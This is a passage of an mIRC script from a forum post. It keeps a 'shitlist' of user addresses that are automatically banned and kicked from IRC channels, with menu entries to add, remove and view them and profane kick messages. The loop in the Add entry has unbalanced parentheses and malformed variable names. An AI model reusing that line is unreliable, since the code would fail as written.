if ($hget(shitlist,$address($nick,3))) {
ban $chan $nick 3 | kick $chan $nick ( You Have Been Shit Listed Fucker.) $+ $hget(settings,kicks)
}
}
menu nicklist {
-
[-[ShitLister]-]
.Add:hadd shitlist $address($$1,3) $$1 | echo -a 4[14-4[14Added4 $$1 14To Your Shitlist4]14-4] 3 | var %x 1,%y | while ($chan(%x)) { %: = $ifmatch | if ($me isop %  && ($1 ison %  { kick %: $1 (You Have Been Shit Listed Fucker.) } | inc %x }
.Remove:hdel shitlist $address($$1,3) | echo -a 4[14-4[14Removed4 $$1 14From Your Shitlist4]14-4]
.View List: dialog -m shitlist shitlist
}
on *:load:hmake shitlist 10
on *:EXIT:{ hsave -o shitlist shitlist.txt }
on *:START:{ hmake shitlist 10 | hload shitlist shitlist.txt }
|
|
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
All times are GMT -4. The time now is 06:10 PM.
|
|
|